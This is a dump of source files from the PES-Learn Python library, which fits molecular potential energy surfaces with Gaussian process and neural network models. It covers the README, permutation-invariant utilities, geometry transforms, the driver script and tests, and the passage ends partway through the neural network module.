Status](https://travis-ci.org/CCQC/PES-Learn.svg?branch=master)](https://travis-ci.org/CCQC/PES-Learn)\n[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause)\n\nPES-Learn is a Python library designed to fit system-specific Born-Oppenheimer potential energy surfaces using modern machine learning models. 
PES-Learn assists in generating datasets, and features Gaussian process and neural network model optimization routines. The goal is to provide high-performance models for a given dataset without requiring user expertise in machine learning.\n\nThis project is young and under active development. It is recommended to take a look at the [Tutorials](1_Tutorials), the [FAQ page](2_FAQ/FAQ.md), and the list of [keyword options](3_Keywords/keywords.md) before using PES-Learn for research purposes. More documentation will be added periodically. Questions and comments are encouraged; please consider submitting an issue. \n\n## Features\n\n* **Ease of Use**\n * PES-Learn can be run by writing an input file and running the code (much like most electronic structure theory packages)\n * PES-Learn also features a Python API for more advanced workflows\n * Once ML models are finished training, PES-Learn automatically writes a Python file containing a function for evaluating the energies at new geometries. \n \n* **Data Generation**\n * PES-Learn supports input file generation and output file parsing for arbitrary electronic structure theory packages such as Psi4, Molpro, Gaussian, NWChem, etc. \n * Data is generated with user-defined internal coordinate displacements with support for:\n * Redundant geometry removal\n * Configuration space filtering\n\n* **Automated Data Transformation**\n * Rotation, translation, and permutation invariant molecular geometry representations\n\n* **Automated Machine Learning Model Generation**\n * Neural network models are built using PyTorch\n * Gaussian process models are built using GPy\n\n* **Hyperparameter Optimization**\n\n\n## Installation Instructions \nPES-Learn has been tested and developed on Linux, Mac, and Windows 10 through the Windows Subsystem for Linux. To install using `pip`: \nClone the repository: \n`git clone https://github.com/adabbott/PES-Learn.git` \nChange into top-level directory: \n`cd PES-Learn` \nInstall PES-Learn and all dependencies: \n`python setup.py install` \nTo avoid having to re-install the package whenever a change is made to the code, run\n`pip install -e .` \n### Install using an Anaconda environment\nThe above procedure works just fine, however for performance and stability, we recommend installing all PES-Learn dependencies in a clean Anaconda environment. 
\nAfter installing [Anaconda for Python3](https://www.anaconda.com/distribution/), create and activate an environment: \n```conda create -n peslearn python=3.6``` \n```conda activate peslearn``` \nThe required dependencies can be installed in one line: \n```conda install -c conda-forge -c pytorch -c omnia gpy pytorch scikit-learn pandas hyperopt cclib``` \nThen install the PES-Learn package: \n`git clone https://github.com/adabbott/PES-Learn.git` \n`python setup.py install` \n`pip install -e .` \n\n\nTo update PES-Learn in the future, run `git pull` while in the top-level directory `PES-Learn`.\n\nTo run the test suite, you need pytest: `pip install pytest-cov` \nTo run tests, in the top-level directory called `PES-Learn`, run: `py.test -v tests/`\n\n## Citing PES-Learn\n[PES-Learn: An Open-Source Software Package for the Automated Generation of Machine Learning Models of Molecular Potential Energy Surfaces ](https://pubs.acs.org/doi/10.1021/acs.jctc.9b00312)\n\nBibtex:\n```\n```\n\n\n\n\n## Funding \nThis project is a collaboration with the [Molecular Sciences Software Institute](http://molssi.org).\nThe author gratefully acknowledges MolSSI for funding the development of this software.\n" }, { "alpha_fraction": 0.6047194600105286, "alphanum_fraction": 0.6193032264709473, "avg_line_length": 38.49599838256836, "blob_id": "0762bb08d4fe2af210c9e1dfaf8e3f5f1b074efd", "content_id": "0a6f122682af50d4a9bdee220773d031279d4b28", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9874, "license_type": "permissive", "max_line_length": 154, "num_lines": 250, "path": "/peslearn/lib/induced_permutations.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# This code aims to take an arbitrary molecular system AnBmCp... with any number of like atoms and:\n# 1. Determine the atom permutation operations (cycles) of the permutation groups Sn, Sm, Sp ... \n# 2. Find the induced permutations of the atom permutation operations of Sn, Sm, Sp ... on the set of interatomic distances\n# 3. Export Singular code to derive the fundamental invariants\n# Result: a generalized algorithm for obtaining a permutationally invariant basis for geometrical parameters so that the PES is permutation invariant\n\nimport numpy as np\nimport itertools as it\nimport math\nimport copy\n\ndef generate_permutations(k):\n \"\"\"\n Generates a list of lists of all possible orderings of k indices\n \"\"\"\n f_k = math.factorial(k)\n A = []\n for perm in (it.permutations(range(k))):\n A.append(list(perm)) \n return A\n\n\ndef find_cycles(perm):\n \"\"\"\n Finds the cycle(s) required to get the permutation. For example,\n the permutation [3,1,2] is obtained by permuting [1,2,3] with the cycle [1,2,3]\n read as \"1 goes to 2, 2 goes to 3, 3 goes to 1\".\n Sometimes cycles are products of more than one subcycle, e.g. 
(12)(34)(5678)\n \"\"\"\n pi = {i: perm[i] for i in range(len(perm))}\n cycles = []\n\n while pi:\n elem0 = next(iter(pi)) # arbitrary starting element\n this_elem = pi[elem0]\n next_item = pi[this_elem]\n\n cycle = []\n while True:\n cycle.append(this_elem)\n del pi[this_elem]\n this_elem = next_item\n if next_item in pi:\n next_item = pi[next_item]\n else:\n break\n cycles.append(cycle[::-1])\n\n # only save cycles of size 2 and larger\n cycles[:] = [cyc for cyc in cycles if len(cyc) > 1]\n return cycles\n\n\ndef generate_bond_indices(natoms):\n \"\"\"\n natoms: int\n The number of atoms\n Finds the array of bond indices of the upper triangle of an interatomic distance matrix, in column wise order\n ( or equivalently, lower triangle of interatomic distance matrix in row wise order):\n [[0,1], [0,2], [1,2], [0,3], [1,3], [2,3], ...,[0, natom], ...,[natom-1, natom]]\n \"\"\" \n # initialize j as the number of atoms\n j = natoms - 1\n # now loop backward until you generate all bond indices \n bond_indices = []\n while j > 0:\n i = j - 1\n while i >= 0:\n new = [i, j]\n bond_indices.insert(0, new)\n i -= 1\n j -= 1 \n return bond_indices\n\ndef molecular_cycles(atomtype_vector):\n \"\"\"\n Finds the complete set of cycles that may act on a molecular system.\n Given an atomtype vector, containing the number of each atom:\n 1. generate the permutations of each atom\n 2. generate the cycles of each atom\n 3. adjust the indices to be nonoverlapping, so that each atom has a unique set of indices.\n For example, For an A2BC system, the indices may be assigned as follows: A 0,1; B 2; C 3; \n while the methods generate_permutations and find_cycles index from 0 for every atom, so we adjust the indices of every atom appropriately\n \"\"\"\n permutations_by_atom = [] \n for atom in atomtype_vector:\n # add the set of permutations for each atom type to permutations_by_atom\n permutations_by_atom.append(generate_permutations(atom)) # an array of permutations is added for atom type X\n cycles_by_atom = [] \n # each atom has a set of permutations, saved in permutations_by_atom \n for i, perms in enumerate(permutations_by_atom):\n cycles = []\n # find the cycles of each permutation and append to cycles, then append cycles to cycles_by_atom\n for perm in perms:\n cyc = find_cycles(perm)\n if cyc: # dont add empty cycles (identity permutation)\n cycles.append(cyc)\n cycles_by_atom.append(cycles)\n # now update the indices of the second atom through the last atom since they are currently indexed from zero\n # to do this we need to know the number of previous atoms, num_prev_atoms\n atomidx = 0\n num_prev_atoms = 0\n for atom in cycles_by_atom[1:]:\n num_prev_atoms += atomtype_vector[atomidx]\n for cycle in atom:\n for subcycle in cycle: # some cycles are composed of two or more subcycles (12)(34) etc.\n for i, idx in enumerate(subcycle): \n subcycle[i] = idx + num_prev_atoms\n atomidx += 1\n return cycles_by_atom\n\n\ndef permute_bond(bond, cycle):\n \"\"\"\n Permutes a bond inidice if the bond indice is affected by the permutation cycle.\n There is certainly a better way to code this. 
Yikes.\n \"\"\"\n count0 = 0\n count1 = 0\n # if the bond indice matches the cycle indice, set the bond indice equal to the next indice in the cycle\n # we count so we dont change a bond indice more than once.\n # If the cycle indice is at the end of the list, the bond indice should become the first element of the list since thats how cycles work.\n # theres probably a better way to have a list go back to the beginning\n for i, idx in enumerate(cycle):\n if (bond[0] == idx) and (count0 == 0):\n try:\n bond[0] = cycle[i+1]\n except:\n bond[0] = cycle[0]\n count0 += 1\n\n if (bond[1] == idx) and (count1 == 0):\n try:\n bond[1] = cycle[i+1]\n except:\n bond[1] = cycle[0]\n count1 += 1\n # sort if the permutation messed up the order. if you convert 1,2 to 2,1, for example \n bond.sort()\n return bond \n \ndef permute_bond_indices(atomtype_vector):\n \"\"\"\n Permutes the set of bond indices of a molecule according to the complete set of valid molecular permutation cycles\n atomtype_vector: array-like\n A vector of the number of each atoms, the length is the total number of atoms.\n An A3B8C system would be [3, 8, 1]\n Returns many sets permuted bond indices, the number of which equal to the number of cycles\n \"\"\"\n natoms = sum(atomtype_vector) \n bond_indices = generate_bond_indices(natoms) \n cycles_by_atom = molecular_cycles(atomtype_vector)\n \n bond_indice_permutations = [] # interatomic distance matrix permutations\n for atom in cycles_by_atom:\n for cycle in atom:\n tmp_bond_indices = copy.deepcopy(bond_indices) # need a deep copy, list of lists\n for subcycle in cycle:\n for i, bond in enumerate(tmp_bond_indices):\n tmp_bond_indices[i] = permute_bond(bond, subcycle)\n bond_indice_permutations.append(tmp_bond_indices) \n\n return bond_indice_permutations \n\ndef induced_permutations(atomtype_vector, bond_indice_permutations):\n \"\"\"\n Given the original bond indices list [[0,1],[0,2],[1,2]...] and a permutation of this bond indices list,\n find the permutation vector that maps the original to the permuted list. \n Do this for all permutations of the bond indices list. 
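\n    A minimal hand-worked sketch (checked by hand, not captured program output): for an A2B system, atomtype_vector = [2, 1], the bond list is [[0,1],[0,2],[1,2]]; swapping the two A atoms permutes it to [[0,1],[1,2],[0,2]], so the mapping vector is [0, 2, 1] and the cycle returned here is [[1, 2]].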
\n    Result: The complete set of induced interatomic distance matrix permutations caused by the molecular permutation cycles \n    \"\"\"\n    natoms = sum(atomtype_vector) \n    bond_indices = generate_bond_indices(natoms) \n    \n    induced_perms = [] \n    for bip in bond_indice_permutations:\n        perm = []\n        for bond1 in bond_indices:\n            for i, bond2 in enumerate(bip):\n                if bond1 == bond2:\n                    perm.append(i)\n        cycle = find_cycles(perm) \n        induced_perms.append(cycle)\n    return induced_perms\n    \n\ndef write_singular_input(natoms, induced_perms):\n    # Singular doesn't tolerate 0-indexing, so we add 1 to every element\n    for cycle in induced_perms:\n        for subcycle in cycle:\n            for i in range(len(subcycle)):\n                subcycle[i] += 1\n\n    # create interatomic distance variables\n    A = []\n    nbonds = int((natoms**2 - natoms) / 2)\n    for i in range(1,nbonds+1):\n        A.append(\"x\"+str(i))\n\n    operators = ''\n    count = 0\n    for cycle in induced_perms:\n        if count == 0:\n            operators += 'list'\n        else: \n            operators += ',list'\n        count += 1\n\n        if len(cycle) > 1:\n            operators += '('\n            for subcycle in cycle:\n                operators += 'list'\n                operators += str(tuple(subcycle))\n                # add comma except at end\n                if subcycle != cycle[-1]:\n                    operators += ','\n            operators += ')'\n        else:\n            if len(cycle) == 1:\n                operators += '(list' + str(tuple(cycle[0])) + ')'\n\n    line1 = \"LIB \\\"finvar.lib\\\";\\n\" \n    line2 = \"ring R=0,({}),dp;\\n\".format(\",\".join(map(str,A)))\n    line3 = \"def GEN=list({});\\n\".format(operators)\n    line4 = \"matrix G = invariant_algebra_perm(GEN,0);\\n\" \n    line5 = \"G;\"\n    return (line1 + line2 + line3 + line4 + line5)\n\n\ndef atom_combinations(N):\n    \"\"\"\n    Generates the combinations of atom numbers for a molecular system with total number of atoms equal to N\n    \"\"\"\n    atomindices = []\n    for i in range(1,N+1):\n        atomindices.append(i)\n    combos = [] \n    for i in range(1, N+1):\n        for combo in it.combinations_with_replacement(atomindices, i):\n            if sum(combo) == N: \n                combos.append(list(combo))\n    return combos\n\n# use this to test. The vector should be in the same order as the axes of the interatomic distance matrix; i.e., if columns are indexed by H H H C C O, the vector should be [3,2,1]\natomtype_vector = [3]\nbond_indice_permutations = permute_bond_indices(atomtype_vector)\nIP = induced_permutations(atomtype_vector, bond_indice_permutations)\nsingular = write_singular_input(sum(atomtype_vector), IP)\nprint(\"Here is your Singular input file. 
Install Singular, copy paste text into a file, and run with 'Singular (inputfilename)'\\n\\n\")\nprint(singular)\n" }, { "alpha_fraction": 0.6633216142654419, "alphanum_fraction": 0.6643251180648804, "avg_line_length": 33.96491241455078, "blob_id": "bd21c1fda336ecb8f068f11ad3a3f7cc934a72c4", "content_id": "313b1240d9c9d416826596de98c2ddeb9578af2e", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1993, "license_type": "permissive", "max_line_length": 120, "num_lines": 57, "path": "/peslearn/driver.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nDriver for PES-Learn\n\"\"\"\nimport timeit\nimport sys\nimport os\nimport json\nfrom six.moves import input\nfrom collections import OrderedDict\nimport peslearn\nimport numpy as np\nimport pandas as pd\n\nwith open('input.dat', 'r') as f:\n input_string = f.read()\n\ninput_obj = peslearn.InputProcessor(input_string)\n\nif input_obj.keywords['mode'] == None:\n text = input(\"Do you want to 'generate' data, 'parse' data, or 'learn'?\")\n text = text.strip()\n\nelse:\n text = input_obj.keywords['mode']\n\nstart = timeit.default_timer()\n\nif text == 'generate' or text == 'g':\n mol = peslearn.datagen.Molecule(input_obj.zmat_string)\n config = peslearn.datagen.ConfigurationSpace(mol, input_obj)\n template_obj = peslearn.datagen.Template(\"./template.dat\")\n config.generate_PES(template_obj)\n print(\"Data generation finished in {} seconds\".format(round((timeit.default_timer() - start),2)))\n\nif text == 'parse' or text == 'p':\n mol = peslearn.datagen.Molecule(input_obj.zmat_string)\n peslearn.utils.parsing_helper.parse(input_obj, mol)\n\nif text == 'learn' or text == 'l':\n if input_obj.keywords['use_pips'] == 'true':\n mol = peslearn.datagen.Molecule(input_obj.zmat_string)\n if input_obj.keywords[\"ml_model\"] == 'gp':\n if input_obj.keywords['use_pips'] == 'true':\n gp = peslearn.ml.GaussianProcess(input_obj.keywords[\"pes_name\"], input_obj, molecule_type=mol.molecule_type)\n else:\n gp = peslearn.ml.GaussianProcess(input_obj.keywords[\"pes_name\"], input_obj)\n gp.optimize_model()\n\n if input_obj.keywords[\"ml_model\"] == 'nn':\n if input_obj.keywords['use_pips'] == 'true':\n nn = peslearn.ml.NeuralNetwork(input_obj.keywords[\"pes_name\"], input_obj, molecule_type=mol.molecule_type)\n else:\n nn = peslearn.ml.NeuralNetwork(input_obj.keywords[\"pes_name\"], input_obj)\n nn.optimize_model()\n \nstop = timeit.default_timer()\nprint(\"Total run time: {} seconds\".format(round(stop - start,2)))\n" }, { "alpha_fraction": 0.7796609997749329, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 21.125, "blob_id": "3e1e82b470886f033f2dbde4ac5f57e8496987f3", "content_id": "9eb5a4f94113774d760a460bb721278f8b5ec577", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "permissive", "max_line_length": 43, "num_lines": 8, "path": "/peslearn/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import datagen\nfrom . import ml\nfrom . import utils\nfrom . import lib\nfrom . import input_processor\nfrom . 
import constants \n\nfrom .input_processor import InputProcessor\n" }, { "alpha_fraction": 0.6257197856903076, "alphanum_fraction": 0.6641075015068054, "avg_line_length": 23.809524536132812, "blob_id": "31222410ba07a50ed789094047a14c0f26172133", "content_id": "8c7d1d119021861a41b4be2f0335b5d9012c7153", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 521, "license_type": "permissive", "max_line_length": 62, "num_lines": 21, "path": "/tests/test_input_processor.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest the TemplateProcessor class methods\n\"\"\"\n\nimport peslearn\nimport pytest\n\npath = 'tests/datafiles/input_zmat_1'\nwith open(path, 'r') as f:\n input_string = f.read()\n\ninput_object = peslearn.InputProcessor(input_string)\n\nmol = peslearn.datagen.Molecule(input_object.zmat_string)\n\ndef test_extract_intcos_ranges():\n input_object.extract_intcos_ranges()\n x = input_object.intcos_ranges \n y = [[0.7, 1.4, 8],[0.5, 1.8, 4.0],[1.0],[1],[-1],[180.0]]\n for key, value in x.items():\n assert value in y\n" }, { "alpha_fraction": 0.6112151145935059, "alphanum_fraction": 0.6334019899368286, "avg_line_length": 39.44696807861328, "blob_id": "d22b37868cd630849bfeb0b86f76b6e81808281a", "content_id": "a8d83faff41d8ed2418fb9bd8da423801bf754fc", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10682, "license_type": "permissive", "max_line_length": 138, "num_lines": 264, "path": "/peslearn/utils/geometry_transform_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nVarious functions for molecular geometry transformations\n\"\"\"\nimport math\nimport numpy as np\nimport pandas as pd\nimport re\nimport os\nfrom itertools import combinations\nfrom .regex import xyz_block_regex,maybe\nfrom ..constants import deg2rad, rad2deg\nimport collections\n\ndef get_interatom_distances(cart):\n n = len(cart)\n matrix = np.zeros((n,n))\n for i,j in combinations(range(len(cart)),2):\n R = np.linalg.norm(cart[i]-cart[j])\n #create lower triangle matrix\n matrix[j,i] = R\n return matrix\n\ndef vectorized_unit_vector(coord_pairs):\n \"\"\"\n Finds all unit vectors between a series of coordinate pairs\n \"\"\"\n # First split arrays along pairs of atom coordinates between which unit vectors will be computed\n split = np.split(coord_pairs, 2, 1)\n a, b = np.squeeze(split[0]), np.squeeze(split[1])\n # compute unit vectors between points \n #einsum may be faster than linalg?? 
https://stackoverflow.com/questions/7741878/how-to-apply-numpy-linalg-norm-to-each-row-of-a-matrix\n tmp = b - a\n #norms = np.linalg.norm(tmp, axis=1).reshape(-1,1)\n norms = np.sqrt(np.einsum('ij,ij->i', tmp, tmp)).reshape(-1,1)\n unit_vecs = tmp[:] / norms\n return unit_vecs\n\ndef vectorized_unit_cross_product(uvec1, uvec2):\n \"\"\"\n Returns all cross products between every pair of unit vectors in uvec1 and uvec2\n \"\"\"\n #products = np.cross(uvec1, uvec2)\n products = np.cross(np.round(uvec1,12), np.round(uvec2,12))\n # If cross product is zero, it is due to co-linear atoms\n #print(np.all(np.isclose(products, np.zeros_like(products)), axis=1))\n #colinear_atoms_bool = np.all(np.isclose(products, np.zeros_like(products)), axis=1)\n #if np.any(np.all(np.isclose(products, np.zeros_like(products)), axis=1)):\n # print('co-linear atoms detected')\n #norms = np.linalg.norm(products, axis=1).reshape(-1,1)\n norms = np.sqrt(np.einsum('ij,ij->i', products, products)).reshape(-1,1)\n unit_vecs = products[:] / norms\n return unit_vecs\n\ndef vectorized_bond_vector(coords):\n \"\"\"\n Compute vector of bond in local axes of internal coordinates for all internal coordinates.\n coords is an array of bond, angle, dihedral values for a particular atom\n \"\"\"\n x = coords[:,0] * np.sin(coords[:,1]) * np.sin(coords[:,2])\n y = coords[:,0] * np.sin(coords[:,1]) * np.cos(coords[:,2])\n z = coords[:,0] * np.cos(coords[:,1])\n return np.array([x,y,z]).T\n\ndef vectorized_local_axes(three_atoms_coords):\n \"\"\"\n Takes as an argument a Nx3x3 block of reference atom coordinates to construct N local axes systems (Nx3x3)\n \"\"\"\n u12 = vectorized_unit_vector(three_atoms_coords[:, [0,1], :])\n u23 = vectorized_unit_vector(three_atoms_coords[:, [1,2], :])\n if np.any(np.einsum('ij,ij->i', u12,u23)) > 1.0:\n print(\"co-linear atoms detected\")\n u23_x_u12 = vectorized_unit_cross_product(u23, u12)\n u12_x_u23_x_u12 = vectorized_unit_cross_product(u12, u23_x_u12)\n z = u12\n y = u12_x_u23_x_u12\n x = vectorized_unit_cross_product(y, z)\n local_axes = np.transpose(np.array([x, y, z]), (1,0,2))\n return local_axes\n\ndef vectorized_zmat2xyz(intcos, zmat_indices, permutation_vector, natoms):\n \"\"\"\n Takes array of internal coordinates, creates 3d cartesian coordinate block of all Cartesian coordinates\n\n Parameters\n ---------\n intcos : arr\n A NumPy array of shape (n_geoms, n_internal_coords) containing a series of internal coordinate definitions\n zmat_indices : arr\n A NumPy array of shape (n_internal_coords) containing a series of ZMAT connectivity indices (NOT zero-indexed.)\n permutation_vector : arr\n A NumPy array of shape (n_atoms) describing how to permute atom order to standard order \n natoms : int\n The number of atoms (including dummy atoms)\n\n Returns \n ---------\n cart : arr\n A NumPy array of all Cartesian coordinates corresponding to internal coordinates. \n Has shape (n_geoms, n_atoms, 3), i.e., it is a list of 2d Cartesian coordinate blocks.\n Cartesian coordinates of atoms are then permuted according to the permutation_vector.\n In PES-Learn, this is done such that the element order is most common atom to least common, \n with an alphabetical tiebreaker. 
\n Example: C C H H H O O would be transformed to --> H H H C C O O\n \"\"\"\n zmat_indices = zmat_indices - 1\n # Convert all angular coordinates (which are in degrees) into radians \n angular_coord_indices = [i for i in range(2,intcos.shape[1], 3)] + [i for i in range(4,intcos.shape[1] ,3)]\n intcos[:,angular_coord_indices] *= deg2rad\n # Create Cartesians zero array\n cart = np.zeros((intcos.shape[0],natoms,3))\n # Assign Cartesian coordinates of first three atoms: Atom0: origin. Atom1:x=0,y=0,z=r1. Atom2:x=0, y=r2*sin(a1), z=complicated\n cart[:,1,2] = intcos[:,0]\n cart[:,2,1] = intcos[:,1]*np.sin(intcos[:,2])\n cart[:,2,2] = cart[:,zmat_indices[1],2] + (1 - 2 * float(zmat_indices[1]==1))*intcos[:,1]*np.cos(intcos[:,2])\n\n # Assign Cartesian coordinates of all additional atoms\n j = 3\n for i in range(3, natoms):\n # Pass the Cartesian coordinates of 3 reference atoms for all displacements at once\n local_axes = vectorized_local_axes(cart[:, [zmat_indices[j], zmat_indices[j+1], zmat_indices[j+2]], :])\n bond_vectors = vectorized_bond_vector(intcos[:, [j, j+1, j+2]] )\n disp_vectors = np.einsum('...j, ...jk->...k', bond_vectors, local_axes)\n newcart = cart[:, zmat_indices[j], :] + disp_vectors\n cart[:,i,:] = newcart\n j += 3\n intcos[:,angular_coord_indices] *= rad2deg\n # Permute to standard order (most common elements first, alphabetical tiebreaker)\n p = permutation_vector\n return cart[:,p,:]\n\n\n\ndef unit_vector(coords1, coords2):\n \"\"\"\n Calculate the unit vector between two cartesian coordinates\n \"\"\"\n distance = np.linalg.norm(coords2 - coords1)\n unit_vec = [0.0 for p in range(3)]\n for p in range(3):\n unit_vec[p] = (coords2[p] - coords1[p]) / distance \n return unit_vec\n\ndef unit_cross_product(uvec1, uvec2):\n \"\"\"\n Returns unit cross product between two unit vectors\n Ensures the result is itself a unit vector\n \"\"\"\n cos = np.dot(uvec1, uvec2)\n sin = math.sqrt(1 - cos**2)\n # if the number of atoms is > 3 and there are 3 colinear atoms this will fail\n csc = sin**-1\n return np.cross(uvec1, uvec2) * csc\n\n\ndef get_local_axes(coords1, coords2, coords3):\n u12 = unit_vector(coords1, coords2)\n u23 = unit_vector(coords2, coords3)\n #if (abs(np.dot(u12, u23)) >= 1.0):\n #print('\\nError: Co-linear atoms in an internal coordinate definition')\n u23_x_u12 = unit_cross_product(u23, u12)\n u12_x_u23_x_u12 = unit_cross_product(u12, u23_x_u12)\n z = u12\n y = u12_x_u23_x_u12\n x = unit_cross_product(y, z)\n local_axes = np.array([x, y, z])\n return local_axes\n\n# calculate vector of bond in local axes of internal coordinates\ndef get_bond_vector(r, a, d):\n x = r * math.sin(a) * math.sin(d)\n y = r * math.sin(a) * math.cos(d)\n z = r * math.cos(a)\n bond_vector = np.array([x, y, z])\n return bond_vector\n\n\ndef load_cartesian_dataset(xyz_path):\n \"\"\"\n Loads a cartesian dataset with energies on their own line and with standard cartesian coordinates.\n Reorganizes atoms into standard order (most common elements first, alphabetical tiebreaker)\n \"\"\"\n print(\"Loading Cartesian dataset: {}\".format(xyz_path))\n xyz_re = xyz_block_regex\n with open(xyz_path) as f:\n data = ''\n # remove trailing whitespace\n for line in f:\n line = line.rstrip()\n data += line + '\\n'\n # extract energy,geometry pairs\n #data_regex = \"\\s*-?\\d+\\.\\d+\\s*\\n\" + xyz_re\n #data_regex = maybe(\"\\d\\d?\\n\") + \"\\s*-?\\d+\\.\\d+\\s*\\n\" + xyz_re\n data_regex = maybe(\"\\d+\\n\") + \"\\s*-?\\d+\\.\\d+\\s*\\n\" + xyz_re\n datablock = re.findall(data_regex, data)\n for i in 
range(len(datablock)):\n datablock[i] = list(filter(None, datablock[i].split('\\n')))\n energies = [] \n for datapoint in datablock:\n # check if atom numbers are used, energy line\n if datapoint[0].isdigit():\n a = datapoint.pop(0)\n e = datapoint.pop(0)\n else:\n e = datapoint.pop(0)\n energies.append(e)\n geoms = datablock\n # find atom labels\n sample = geoms[0]\n atom_labels = [re.findall('\\w+', s)[0] for s in sample]\n natoms = len(atom_labels)\n # convert atom labels to standard order (most common element first, alphabetical tiebreaker)\n sorted_atom_counts = collections.Counter(atom_labels).most_common()\n sorted_atom_counts = sorted(sorted_atom_counts, key = lambda x: (-x[1], x[0]))\n sorted_atom_labels = []\n for tup in sorted_atom_counts:\n for i in range(tup[1]):\n sorted_atom_labels.append(tup[0])\n # find the permutation vector which maps unsorted atom labels to standard order atom labels\n p = []\n for i,j in enumerate(sorted_atom_labels):\n for k,l in enumerate(atom_labels):\n if j == l:\n p.append(k)\n atom_labels[k] = 'done'\n continue\n # permute all xyz geometries to standard order \n for g in range(len(geoms)):\n geoms[g] = [geoms[g][i] for i in p]\n\n # write new xyz file with standard order\n #with open('std_' + xyz_path, 'w+') as f:\n # for i in range(len(energies)):\n # f.write(energies[i] +'\\n')\n # for j in range(natoms):\n # f.write(geoms[i][j] +'\\n')\n\n # remove everything from XYZs except floats and convert to numpy arrays\n for i,geom in enumerate(geoms):\n for j,string in enumerate(geom):\n string = string.split()\n del string[0] # remove atom label\n geom[j] = np.asarray(string, dtype=np.float64)\n \n # convert to interatomic distances\n final_geoms = []\n for i in geoms:\n idm = get_interatom_distances(i)\n idm = idm[np.tril_indices(idm.shape[0],-1)]\n final_geoms.append(idm)\n \n final_geoms = np.asarray(final_geoms)\n energies = np.asarray(energies, dtype=np.float64)\n n_interatomics = int(0.5 * (natoms * natoms - natoms))\n bond_columns = []\n for i in range(n_interatomics):\n bond_columns.append(\"r%d\" % (i))\n DF = pd.DataFrame(data=final_geoms, columns=bond_columns)\n DF['E'] = energies\n\n # remove suffix of xyz path if it exists\n finalpath = xyz_path.rsplit(\".\",1)[0]\n finalpath = os.path.splitext(xyz_path)[0]\n DF.to_csv(finalpath + '_interatomics.dat',index=False, float_format='%12.10f')\n return DF\n\n\n\n\n" }, { "alpha_fraction": 0.6907216310501099, "alphanum_fraction": 0.7268041372299194, "avg_line_length": 38, "blob_id": "21b3c3f31af964525fb3735713c664cea9b9f386", "content_id": "ed3fef338168cdd3fdf0475da4a15c318b92edf0", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "permissive", "max_line_length": 101, "num_lines": 5, "path": "/1_Tutorials/1_water_pes_api/model3_data/loadpt.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import torch\n\nnn_model = torch.load(\"/home/dehui2/test/PES-Learn/1_Tutorials/1_water_pes_api/model3_data/model.pt\")\nout = nn_model(torch.tensor([3, 4, 5], dtype=torch.long))\nprint(\"Hello world\")" }, { "alpha_fraction": 0.8153846263885498, "alphanum_fraction": 0.8153846263885498, "avg_line_length": 27.66666603088379, "blob_id": "e875aa18d09b1447751500f5fae8b08ea41cea08", "content_id": "89bbf555a0b1d9591997cd8f10d4097570c67e63", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 260, "license_type": "permissive", 
"max_line_length": 51, "num_lines": 9, "path": "/peslearn/datagen/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import configuration_space\nfrom . import molecule \nfrom . import template\nfrom . import outputfile\n\nfrom .configuration_space import ConfigurationSpace\nfrom .molecule import Molecule\nfrom .template import Template\nfrom .outputfile import OutputFile\n\n\n" }, { "alpha_fraction": 0.5457493662834167, "alphanum_fraction": 0.559836208820343, "avg_line_length": 52.68309783935547, "blob_id": "80195d32673c2ff3ea9a2b683f170dfb4750149f", "content_id": "fd01fadbafca498ebae958bd49af58c10921a171", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30525, "license_type": "permissive", "max_line_length": 225, "num_lines": 568, "path": "/peslearn/ml/neural_network.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nimport numpy as np\nimport pandas as pd\nimport os\nfrom collections import OrderedDict\nimport re\nimport copy\n\nfrom .model import Model\nfrom .data_sampler import DataSampler \nfrom ..constants import hartree2cm, package_directory, nn_convenience_function\nfrom .preprocessing_helper import morse, interatomics_to_fundinvar, degree_reduce, general_scaler\nfrom ..utils.printing_helper import hyperopt_complete\nfrom sklearn.model_selection import train_test_split \nfrom hyperopt import fmin, tpe, hp, STATUS_OK, STATUS_FAIL, Trials, space_eval\nfrom .preprocessing_helper import sort_architectures\n\n\ntorch.set_printoptions(precision=15)\n\nclass NeuralNetwork(Model):\n \"\"\"\n Constructs a Neural Network Model using PyTorch\n \"\"\"\n def __init__(self, dataset_path, input_obj, molecule_type=None, molecule=None, train_path=None, test_path=None, valid_path=None):\n super().__init__(dataset_path, input_obj, molecule_type, molecule, train_path, test_path, valid_path)\n self.trial_layers = self.input_obj.keywords['nas_trial_layers']\n self.set_default_hyperparameters()\n \n if self.input_obj.keywords['validation_points']:\n self.nvalid = self.input_obj.keywords['validation_points']\n if (self.nvalid + self.ntrain + 1) > self.n_datapoints:\n raise Exception(\"Error: User-specified training set size and validation set size exceeds the size of the dataset.\")\n else:\n self.nvalid = round((self.n_datapoints - self.ntrain) / 2)\n \n if self.pip:\n if molecule_type:\n path = os.path.join(package_directory, \"lib\", molecule_type, \"output\")\n self.inp_dim = len(open(path).readlines())\n if molecule:\n path = os.path.join(package_directory, \"lib\", molecule.molecule_type, \"output\")\n self.inp_dim = len(open(path).readlines())\n else:\n self.inp_dim = self.raw_X.shape[1]\n\n 